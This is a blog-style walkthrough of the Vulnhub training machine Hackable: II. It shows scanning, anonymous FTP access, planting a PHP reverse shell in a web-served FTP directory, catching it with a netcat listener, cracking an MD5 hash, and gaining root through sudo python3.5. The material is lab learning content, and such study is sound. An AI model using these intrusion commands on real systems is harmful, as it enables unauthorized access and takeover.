Hackable: II Walkthrough | Vulnhub | INFOCODX

I'm back with another Vulnhub Walkthrough, this time on Hackable:II by Elias Sousa. It's not too hard, but it's fun and educational. I'll also highlight some Python tools made for this. Let's get started!

 

Disclaimer:

The information, techniques, and tools presented in this document are intended solely for educational purposes. Any utilization of the content within this document is at your own discretion, and I cannot be held accountable for any harm inflicted upon systems or individuals legally. Engaging in the unauthorized use of the tools and techniques outlined in this document to target individuals or organizations is strictly prohibited by law. It is your responsibility to adhere to all relevant local, state, and federal regulations. I disclaim any liability and will not be held responsible for any misuse or harm resulting from the application of the information provided herein.

About vulnhub.com

Vulnhub is a website that caters to the security community and provides them with training environments. It presents a diverse range of virtual machines and networks that can be downloaded to enhance one's cybersecurity skills in both offensive and defensive aspects.

Finding IP :-

To find the target IP address just enter netdiscover command.

command :sudo netdiscover -r <The PC IP>

The tool indicates that the location of Hackable is situated at 10.0.2.28.

Network Scanning :-

I conducted an Nmap scan to identify the service, version, and operating system in use. Additionally, I performed a comprehensive port scan to detect any open ports.

command :nmap -sV -A <machines IP>

We have discovered through Nmap that there are three open ports: 21, 22, and 80. The web server on port 80 displays the default Apache page. Port 21, utilized for FTP, permits anonymous login, which is a positive indication. To begin with, we should access the FTP and explore its contents.

FTP:-

command : ftp <machines IP>

Enter "anonymous" as your name and choose any password you like.

To identify the CALL.html file, download it to examine its contents and understand our work.

Download the CALL.html

command : get CALL.html

This HTML file seems to be quite basic.

Directory enumeration :-

While searching for hidden directories.

command :gobuster dir --url(ip) -w /usr/share/wordlists/dirb/common.txt

We stumble upon an engaging directory named "/files". Exploring this webpage exposes the subsequent details.

So, it looks like the directory ‘files’ is served on FTP server. Thus, if I could place a webshell in the FTP server, I could execute it using the web browser.

 Apply a reverse shell injection :-

I copied php-reverse-shell available on Kali machine to my current directory. You can also just google for it and find the same php reverse shell on pentestmonkey

We need to modify the shell a little bit by inputting our IP. My local IP for VirtualBox, so I will set the variable as that and I will also leave the port as 1234. Make sure to use the IP of your machine.

Once again, I opened the ftp client and tried to put the shell in there.

 

command : put (php file name)

Now if we visit http://192.168.187.71/files/ we will see our shell ready to run.

Start by setting up a netcat listener and accessing shell.php.

command : nc -nvlp 1234

I opted against altering the default port specified in the reverse shell file. In the event that you opt for a different port, please ensure to modify your netcat command accordingly.

Opening shell.php gives us a reverse shell.

I will upgrade it via the following command.

command : python3 -c ‘import pty; pty.spawn(“/bin/bash”)’

Escalating our privileges to user Shrek :-

When you first try to access the home directory, you will come across a file called “important.txt”.

This file tells us that there is a hidden script called “.runme.sh”, which we will need to run to get our next clue. I also found the script by checking the directories for hidden files.

Now whether you run the file via “./.runme.sh” or just read the contents with “cat .runme.sh”, you will get same information.

The author had tried to troll us but I escaped his trolling. However, on the bottom of the file, there is something that interested me.

I found an md5 hash and decided to crack it, so I headed over to crackstation.

Now, let's switch up the user a bit.

command : su shrek

In “shrek” directory, we find our user flag.

Get root shell :-

This part was fairly straightforward. I ran the following command

command : sudo -l

and it revealed that we may run python3.5 as root.

Basic search on GTFOBins for “python” reveals that if we enter the following, we should be able to escalate our privileges.

In our case, we are allowed to run as root only for python3.5, so let’s do that instead and add “sudo” in front of the command.

command : sudo python3.5 -c ‘import os; os.system(“/bin/sh”)’

And guess what? We're the root! You can find the root flag in the /root directory.

The machine has nearly completed this task.

Happy hackers!!